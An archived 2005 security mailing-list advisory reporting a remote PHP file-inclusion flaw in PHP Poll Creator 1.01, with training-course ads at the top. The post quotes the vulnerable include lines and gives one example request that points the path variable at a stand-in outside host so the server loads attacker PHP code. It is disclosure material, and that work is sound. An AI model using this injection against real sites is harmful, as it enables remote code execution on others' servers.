Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PHP Injection in PHP Poll Creator

from [rash ilusion] Network Security [Permanent Link]
Subject: PHP Injection in PHP Poll Creator
Date: 25 May 2005 05:16:31 -0000 


svadvisory#6
-------------------------------------------------------------+
    Title: PHP Injection in PHP Poll Creator                 |
 Software: PHP Poll Creator v 1.01                           |
 Homepage: http://www.phppc.de                  +------------+
   Finder: rash                                 |  24.05.05  |
-------------------------------------------------------------+

Description
-------------------------------------------------------------|

Vulnerability has been found in file poll_vote.php

<?php
include $relativer_pfad . "config.inc.php";
include ($relativer_pfad . "lib/functions.inc.php");
....
?>

one can implement any php code, what we need are it, a delivery
the variable $relativer_pfad over URL, with which defintion our
address to our file with php the code this file must absolutely
config.inc.php is designated, otherwise cannot it not function
where one this file put down are it no matter, main thing one
give the exact address to the file config.inc.php with php the
code to where them are.

Example
-------------------------------------------------------------|

poll_vote.php?relativer_pfad=http://domain.tld/dir/


Conclusion
-------------------------------------------------------------|

as I understood it, this is not any longer developed further
script program, but I go of it out of that, all versions am
concerned, but without guarantee.

#############################################################

rash || Search Vulnerabilities Team || www.svt.nukleon.us
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [Full-disclosure] shtool insecure temporary file creation, ZATAZ.net
Next by Date:  [Full-disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : nwprint privilege escalation, please_reply_to_security
Previous by Thread:  [Full-disclosure] shtool insecure temporary file creation, ZATAZ.net
Next by Thread:  Re: PHP Injection in PHP Poll Creator, Michael Cordover
Indexes:  [Date] [Thread] [Top] [All Lists]